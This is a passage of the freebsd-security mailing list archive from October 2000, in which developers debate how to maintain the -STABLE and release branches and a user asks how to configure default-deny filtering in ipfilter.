Watson X-Sender: robert@fledge.watson.org To: John Baldwin Cc: Brett Glass , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington Subject: Re: Stable branch In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think adding additional active development branches will cause problems, but I think that the following might help 1) Increased scrutiny of MFC's in advance so that there's less chance of errors being made (explicit pull-up requests, which are used widely in other open source projects) 2) Make release tags into branches, so that ERRATA and other relevant details for a release can be updated sensically, and so that bug fixes can be backported to the release branch by the release engineers or security officers. Maintain security bug support for the last two -RELEASE's, possibly more if there is demand, backport fixes to active and recent -STABLE branchs, and also allow new features in those branches given (1). Having changes possible in the release branch would mean it would be easier to generate binary updates for specific release versions, something that vendors might want to do when offering support for a specific version of FreeBSD. You could imagine even strategically laying down patch level tags on the branch -- 4.1.1-P1 would include a fix for finger, but be otherwise identical, and so on. These modifications would provide a model for users of FreeBSD releases to get killer bug fixes (the usual few stumbles over the three weeks after a release) and security bug fixes without any support for new features, as feature commits would not be permitted on release branches. Releng (-STABLE) branches would continue to support moderate feature inclusion based on slightly increased reviewing, and -CURRENT would continue to vary in stability widely :-). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 15: 0:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id B6ADB37B66C for ; Thu, 5 Oct 2000 15:00:08 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hJ3a-00060Y-00; Fri, 06 Oct 2000 00:00:02 +0200 Date: Fri, 6 Oct 2000 00:00:02 +0200 (IST) From: Roman Shterenzon To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Stable branch In-Reply-To: <4.3.2.7.2.20001005105420.04a7b540@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Oct 2000, Brett Glass wrote: > Perhaps this should be formalized as three branches: > > Branch name: Bug/security New features? "Breakable" for > fixes? a day or more? > > -PRODUCTION YES NO NO > > -STABLE YES YES, PREFERABLY NO > AFTER TESTING > IN -CURRENT > > -DEVELOPMENT YES YES YES > (formerly -CURRENT) > > What do you think of this as a model for what people seem to be > asking for? There's too much effort has to be done to maintain three branches. The stable branch should be stable like the name implies, and it's stable most of the time. I just think that committers have to be a bit more carefull when bringing in new features. I still cannot forget the DMA/iso9660 breakage :( The stable should be great for production, and, don't forget the simple rule - if your system works fine with 0.99alpha version of some software there's absolutely no reason to upgrade or "track" some branch. So, if the security is not important (I cannot belive I'm saying it in the freebsd-security list) then you can just stick with the release you've installed (of course if it works fine), if the security does matter, then you apply the security fixes by hand and stay cool. Just my 0.02$ P.S. What does it have to do with freebsd-security anyway?! --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 15:39:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 89F2137B503; Thu, 5 Oct 2000 15:39:02 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e95McUX01279; Thu, 5 Oct 2000 15:38:34 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Robert Watson Cc: John Baldwin , Brett Glass , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington Subject: Re: Stable branch In-Reply-To: Message from Robert Watson of "Thu, 05 Oct 2000 15:37:46 EDT." Date: Thu, 05 Oct 2000 15:38:29 -0700 Message-ID: <1275.970785509@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > 1) Increased scrutiny of MFC's in advance so that there's less chance of That's perhaps doable, though others have already commented on the difficulties of getting "scrutiny" before the fact in this project so I won't belabor the point. > 2) Make release tags into branches, so that ERRATA and other relevant That scares me. I don't like the idea of n-way merges. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 15:54:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 98DFA37B502 for ; Thu, 5 Oct 2000 15:54:12 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id SAA00463 for ; Thu, 5 Oct 2000 18:54:09 -0400 Message-ID: <39DCA41A.8AEEF3FC@allmaui.com> Date: Thu, 05 Oct 2000 15:54:02 +0000 From: Craig Cowen X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Default Deny Content-Type: multipart/alternative; boundary="------------C24FBA78FD67B5CF69D96724" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------C24FBA78FD67B5CF69D96724 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Would someone please remind me how to congif my kernel for default deny with ipfilter? Thanks, -- Craig Cowen 408-394-6673 Cell craig-pager@allmaui.com --------------C24FBA78FD67B5CF69D96724 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit     Would someone please remind me how to congif my kernel for default deny with ipfilter?

Thanks,
  

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
  --------------C24FBA78FD67B5CF69D96724-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 16: 4:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 942BF37B503 for ; Thu, 5 Oct 2000 16:04:08 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id KAA22094; Fri, 6 Oct 2000 10:03:57 +1100 (EST) From: Darren Reed Message-Id: <200010052303.KAA22094@cairo.anu.edu.au> Subject: Re: Default Deny To: craig@allmaui.com (Craig Cowen) Date: Fri, 6 Oct 2000 10:03:57 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <39DCA41A.8AEEF3FC@allmaui.com> from "Craig Cowen" at Oct 05, 2000 03:54:02 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Craig Cowen, sie said: > > > --------------C24FBA78FD67B5CF69D96724 > Content-Type: text/plain; charset=us-ascii > Content-Transfer-Encoding: 7bit > > Would someone please remind me how to congif my kernel for default > deny with ipfilter? options IPFILTER_DEFAULT_BLOCK Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 16:37:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 4654437B66D; Thu, 5 Oct 2000 16:37:13 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA18801; Thu, 5 Oct 2000 17:37:03 -0600 (MDT) Message-Id: <4.3.2.7.2.20001005173257.048b9f00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 05 Oct 2000 17:36:56 -0600 To: Warner Losh From: Brett Glass Subject: Re: Stable branch Cc: developers@freebsd.org, security@freebsd.org In-Reply-To: <200010051830.MAA01024@harmony.village.org> References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:30 PM 10/5/2000, Warner Losh wrote: >Otherwise would do a PR spin with the following patch to 3.x would do >the trick (I'd call it -solid, because -stable is suitable for >production machines). Personally, I would equate "-SOLID" with "suitable for production machines" whereas -STABLE would be "OK for application developers and eager/early adopters but still settling down to the confidence level of -SOLID." Which might imply setting things up so that the -STABLE branch becomes -SOLID after, say, a good .2 release. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 16:41:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 56FDD37B66E; Thu, 5 Oct 2000 16:41:20 -0700 (PDT) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13hKdP-000PKH-00; Fri, 06 Oct 2000 01:41:07 +0200 Date: Fri, 6 Oct 2000 01:41:07 +0200 From: Neil Blakey-Milner To: Brett Glass Cc: Warner Losh , developers@freebsd.org, security@freebsd.org Subject: Re: Stable branch Message-ID: <20001006014106.A97336@mithrandr.moria.org> References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com> <200010051830.MAA01024@harmony.village.org> <4.3.2.7.2.20001005173257.048b9f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001005173257.048b9f00@localhost>; from brett@lariat.org on Thu, Oct 05, 2000 at 05:36:56PM -0600 Organization: Sunesi Clinical Systems X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu 2000-10-05 (17:36), Brett Glass wrote: > At 12:30 PM 10/5/2000, Warner Losh wrote: > > >Otherwise would do a PR spin with the following patch to 3.x would do > >the trick (I'd call it -solid, because -stable is suitable for > >production machines). > > Personally, I would equate "-SOLID" with "suitable for production > machines" whereas -STABLE would be "OK for application developers > and eager/early adopters but still settling down to the confidence > level of -SOLID." > > Which might imply setting things up so that the -STABLE branch > becomes -SOLID after, say, a good .2 release. Then people will say, "Oh no, it's the first -SOLID release, we should only start using it after two -SOLID releases". Neil -- Neil Blakey-Milner Sunesi Clinical Systems nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17: 0: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id EE9A737B66C for ; Thu, 5 Oct 2000 16:59:56 -0700 (PDT) Received: (qmail 5352 invoked by uid 1000); 6 Oct 2000 00:02:52 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 6 Oct 2000 00:02:52 -0000 Date: Thu, 5 Oct 2000 19:02:52 -0500 (CDT) From: Mike Silbersack To: Brett Glass Cc: Warner Losh , developers@freebsd.org, security@freebsd.org Subject: Re: Stable branch In-Reply-To: <4.3.2.7.2.20001005173257.048b9f00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Oct 2000, Brett Glass wrote: > At 12:30 PM 10/5/2000, Warner Losh wrote: > > >Otherwise would do a PR spin with the following patch to 3.x would do > >the trick (I'd call it -solid, because -stable is suitable for > >production machines). > > Personally, I would equate "-SOLID" with "suitable for production > machines" whereas -STABLE would be "OK for application developers > and eager/early adopters but still settling down to the confidence > level of -SOLID." > > Which might imply setting things up so that the -STABLE branch > becomes -SOLID after, say, a good .2 release. > > --Brett I think this is getting overly complex. What would be more useful is to continue managing the different branches as is currently done, but provide some assurance that you're getting something release quality when you update. Some time ago, I recall Joe Greco commenting that he only ran releases because updating to stable was too much trouble due to the time it takes to rebuild a system in such a configuration. Additionally, it seems Brett's worried about encountering the situation where -stable is broken due to a bad commit. Would there be some way for cvsup to honor sub-tags, so that, for example, 3.5.2 could be tagged after the libpasswd bug is fixed? This way, committers could feel more at ease when updating stuff in -stable, and cvsuppers could feel more confident updating to the latest pseudo-release in their branch, knowing that they're getting the same working system their friends told them about. It also simplifies security bulletins. No more dates to confuse people, just version numbers to compare. Undoubtedly, this system would still require a full buildworld rather than simple patching, but it should help peoples' faith in -stable, hopefully. Thoughts? I'm not sure if binary releases of these releases would be a good idea or not. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:10:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 7522B37B66D; Thu, 5 Oct 2000 17:10:28 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id UAA27755; Thu, 5 Oct 2000 20:10:41 -0400 (EDT) (envelope-from rjh@mohawk.net) Date: Thu, 5 Oct 2000 20:10:41 -0400 (EDT) From: Ralph Huntington To: Warner Losh Cc: developers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Stable branch In-Reply-To: <200010051824.MAA00945@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I see what you're saying. My suggestion only involved merging bug fixes and security patches into the latest prior version, i.e, 3.5.1 at this time. I would not go further back than that. I thought I was suggesting something that would be less work, not more, since it meant not adding new features into any prior stable branch and only merging fixes into the latest prior stable branch. Perhaps my view of this is simplistic, though, since I am relatively new to this discussion. In no way am I advocating increasing anyone's work load. -=r=- On Thu, 5 Oct 2000, Warner Losh wrote: > In message Ralph Huntington writes: > : the latest release (not current), i.e., since 4.x-RELEASE is the latest, > : then 3.x-STABLE hould be supported with bug fixes and security patches > : until a 5.x-RELEASE is out. > : > : Does this seem unreasonable? -=r=- > > Yes and no. It sounds reasonable, but puts a significant burdon on > the security officer and his security team to make it happen. Having > two machines for -current and -stable is bad enough, plus test > compiling patches on the last N RELEASES of -stable puts a fair load > on getting an advisory out. Making that include a second branch will > nearly double the work and pita factor to make it happen. When I was > doing 4.0-current, 3.2-stable, 3.2-release, 3.1-release, 3.0-release, > 2.2.8-release and 2.2.8-stable regression testing on a couple of > kernel patches it took me a *HUGE* amount of time. 40% of it for 4.x > and 3.x and 60% for the 2.2.8-stable and -release. Why so much for > 2.x? the original author of the patch hadn't back ported it, was > disinclined to back port it so I wound up doing it. This made it > extremely painful to try to get the advisory out (I think it was 6 > weeks from the time the bug hit -current until I sent the advisory > out). > > Until you pay someone to do this full time, it isn't going to happen. > History has shown this. This suggestion comes up every N years, we do > OK with it for a couple of months until one bug comes along that's > such a pain in the butt that we say "screw this old stuff, I'm just > going to stop doing it because it is too much of a pita and no one > seems to care enough to help." and then are happy for a while until we > cut the next major branch in which case we recapitulate the whole > process. > > Sorry to be such a sour puss, but I've "been there, tried that" before. > > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:23:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 18E2C37B502 for ; Thu, 5 Oct 2000 17:23:31 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id UAA30399 for ; Thu, 5 Oct 2000 20:23:29 -0400 Message-ID: <39DCB90A.A32DC570@allmaui.com> Date: Thu, 05 Oct 2000 17:23:23 +0000 From: Craig Cowen X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: ipfilter rules question Content-Type: multipart/alternative; boundary="------------8F20AEF3C6961C2E5C99EE73" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------8F20AEF3C6961C2E5C99EE73 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my kernel. When using ipnat, I have 'pass in on (private interface) from 192.168.0.1 to any keep state' in my rules. I have no rules specified for the public interface. The boxen behind the firewall can surf. Is this right and why. Seems to me I have to allow out on the public interface with keep state for it all to work. -- Craig Cowen 408-394-6673 Cell craig-pager@allmaui.com --------------8F20AEF3C6961C2E5C99EE73 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit I have setup ipf with options  IPFILTER_DEFAULT_BLOCK in my kernel.
When using ipnat, I have 'pass in on (private interface) from 192.168.0.1 to any keep state' in my rules.

I have no rules specified for the public interface.
The boxen behind the firewall can surf.

Is this right and why.

Seems to me I have to allow out on the public interface with keep state for it all to work.
  

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
  --------------8F20AEF3C6961C2E5C99EE73-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:32:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 188E137B503 for ; Thu, 5 Oct 2000 17:32:45 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hLRH-0006Hi-00; Fri, 06 Oct 2000 02:32:39 +0200 Date: Fri, 6 Oct 2000 02:32:39 +0200 (IST) From: Roman Shterenzon To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: Default Deny In-Reply-To: <200010052303.KAA22094@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Oct 2000, Darren Reed wrote: > In some mail from Craig Cowen, sie said: > > Would someone please remind me how to congif my kernel for default > > deny with ipfilter? > > options IPFILTER_DEFAULT_BLOCK Why isn't it mentioned in the LINT file? Neither in man pages I couldn't find it. Should I fill a PR? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:34:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 8AFED37B675 for ; Thu, 5 Oct 2000 17:34:44 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id LAA07087; Fri, 6 Oct 2000 11:34:30 +1100 (EST) From: Darren Reed Message-Id: <200010060034.LAA07087@cairo.anu.edu.au> Subject: Re: Default Deny To: roman@xpert.com (Roman Shterenzon) Date: Fri, 6 Oct 2000 11:34:30 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Roman Shterenzon" at Oct 06, 2000 02:32:39 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Roman Shterenzon, sie said: > > On Fri, 6 Oct 2000, Darren Reed wrote: > > > In some mail from Craig Cowen, sie said: > > > Would someone please remind me how to congif my kernel for default > > > deny with ipfilter? > > > > options IPFILTER_DEFAULT_BLOCK > > Why isn't it mentioned in the LINT file? > Neither in man pages I couldn't find it. > Should I fill a PR? That might be a good idea. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:35:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id B27BA37B670 for ; Thu, 5 Oct 2000 17:35:41 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id UAA01985 for ; Thu, 5 Oct 2000 20:35:40 -0400 Message-ID: <39DCBBE5.D547475A@allmaui.com> Date: Thu, 05 Oct 2000 17:35:33 +0000 From: Craig Cowen X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG Subject: Re: Default Deny References: Content-Type: multipart/alternative; boundary="------------CD0291976C60E5147E2B0178" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------CD0291976C60E5147E2B0178 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I had a hell of a time finding this info when I first set up ipf. obfusication.org has everything you need to know once you have it setup but no precise setup info. Craig Roman Shterenzon wrote: > On Fri, 6 Oct 2000, Darren Reed wrote: > > > In some mail from Craig Cowen, sie said: > > > Would someone please remind me how to congif my kernel for default > > > deny with ipfilter? > > > > options IPFILTER_DEFAULT_BLOCK > > Why isn't it mentioned in the LINT file? > Neither in man pages I couldn't find it. > Should I fill a PR? > > --Roman Shterenzon, UNIX System Administrator and Consultant > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Craig Cowen 408-394-6673 Cell craig-pager@allmaui.com --------------CD0291976C60E5147E2B0178 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit I had a hell of a time finding this info when I first set up ipf.
obfusication.org has everything you need to know once you have it setup but no precise setup info.

Craig
Roman Shterenzon wrote:

On Fri, 6 Oct 2000, Darren Reed wrote:

> In some mail from Craig Cowen, sie said:
> >     Would someone please remind me how to congif my kernel for default
> > deny with ipfilter?
>
> options IPFILTER_DEFAULT_BLOCK

Why isn't it mentioned in the LINT file?
Neither in man pages I couldn't find it.
Should I fill a PR?

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
  --------------CD0291976C60E5147E2B0178-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:40:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 3416837B503 for ; Thu, 5 Oct 2000 17:40:09 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hLYW-0006Jx-00; Fri, 06 Oct 2000 02:40:08 +0200 Date: Fri, 6 Oct 2000 02:40:08 +0200 (IST) From: Roman Shterenzon To: Craig Cowen Cc: freebsd-security@FreeBSD.ORG Subject: Re: Default Deny In-Reply-To: <39DCBBE5.D547475A@allmaui.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 5 Oct 2000, Craig Cowen wrote: > I had a hell of a time finding this info when I first set up ipf. > obfusication.org has everything you need to know once you have it setup but > no precise setup info. > > Craig The ipfilter in freebsd seems cursed or abandoned. Example: this option is not documented. Another example: there're no hooks to start ipfilter from /etc/rc* eventhough there's PR: 20202 > Roman Shterenzon wrote: > > > On Fri, 6 Oct 2000, Darren Reed wrote: > > > > > In some mail from Craig Cowen, sie said: > > > > Would someone please remind me how to congif my kernel for default > > > > deny with ipfilter? > > > > > > options IPFILTER_DEFAULT_BLOCK > > > > Why isn't it mentioned in the LINT file? > > Neither in man pages I couldn't find it. > > Should I fill a PR? > > > > --Roman Shterenzon, UNIX System Administrator and Consultant > > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > Craig Cowen > 408-394-6673 Cell > craig-pager@allmaui.com > > > --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:41:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 38F0537B503 for ; Thu, 5 Oct 2000 17:41:40 -0700 (PDT) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id UAA01115; Thu, 5 Oct 2000 20:41:23 -0400 (EDT) Date: Thu, 5 Oct 2000 20:41:23 -0400 (EDT) From: To: Darren Reed Cc: Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: Default Deny In-Reply-To: <200010060034.LAA07087@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Why isn't it mentioned in the LINT file? > > Neither in man pages I couldn't find it. > > Should I fill a PR? > > That might be a good idea. Darren you could of commited a fix in the time it took you to reply to this email. So since you have the time why not go fix it now. And he wont have to file a PR. ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:46:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id A2AA837B502 for ; Thu, 5 Oct 2000 17:46:38 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id LAA09224; Fri, 6 Oct 2000 11:46:28 +1100 (EST) From: Darren Reed Message-Id: <200010060046.LAA09224@cairo.anu.edu.au> Subject: Re: Default Deny To: scanner@jurai.net Date: Fri, 6 Oct 2000 11:46:28 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "scanner@jurai.net" at Oct 05, 2000 08:41:23 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from scanner@jurai.net, sie said: > > > > > > Why isn't it mentioned in the LINT file? > > > Neither in man pages I couldn't find it. > > > Should I fill a PR? > > > > That might be a good idea. > > Darren you could of commited a fix in the time it took you to > reply to this email. So since you have the time why not go fix it now. And > he wont have to file a PR. You're assuming I have setup access to cvs for FreeBSD for everywhere that I have access/accounts and that it'll still be on my mind when I'm in a position to do so. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:49:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id B66F037B66C for ; Thu, 5 Oct 2000 17:49:48 -0700 (PDT) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id UAA01287; Thu, 5 Oct 2000 20:49:42 -0400 (EDT) Date: Thu, 5 Oct 2000 20:49:42 -0400 (EDT) From: To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: 